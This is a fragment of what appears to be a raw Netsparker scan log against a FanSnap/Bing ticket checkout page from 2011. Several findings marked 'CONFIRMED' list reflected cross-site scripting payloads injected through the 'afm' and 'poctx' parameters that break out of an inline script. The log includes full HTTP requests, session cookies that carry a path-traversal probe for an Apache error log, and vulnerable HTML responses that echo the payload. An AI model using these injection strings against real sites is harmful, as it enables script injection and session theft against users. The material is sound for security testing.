value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-87-175', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: ''"--></style></script><script>netsparker(0x00002C)</script>', afm: '3' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100721%26_st%3D%26_ma%3D13%26_ref%3D' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET '"--></style></script><script>alert(0x000035)</script>
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000035)%3C/script%3E&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DvOa2aBjoLb2Zmc2V0af6QnQ%3D%3D--0e3b57bdd3d713527955bbb8b7923bf4a4b47e9d; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "92e3447acd909c73b080aa6932a4db1c"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BkzbaaBjoLb2Zmc2V0af6QnQ%3D%3D--a9069f3a55bac1fd824d7797f69ec27fed5bed5c; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3609
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: ''"--></style></script><script>netsparker(0x000035)</script>' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100723%26_st%3D%26_ma%3D13%26_ref%3D' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET 2
lp GET true
poctx GET '"--></style></script><script>alert(0x00003A)</script>
afm GET 3
uet GET -776896836:7925:pgstickets||bing|mt:int;sz:1254;id:389669
commit GET Change
zipcode GET 3

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003A)%3C/script%3E&afm=3&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669&commit=Change&zipcode=3 HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4D5%2BcCaBjoLb2Zmc2V0af6QnQ%3D%3D--e15e051d419d96478c50f49f3cc3727c47b49566; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "c0f573f37394c4fc84fd0ceea67f9e4b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4A8KMKaBjoLb2Zmc2V0af6QnQ%3D%3D--0cfd5c072fe56f4faa4a127516afcd4b6fff04d5; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3746
Connection: close
Content-Type: text/html; charset=utf-8


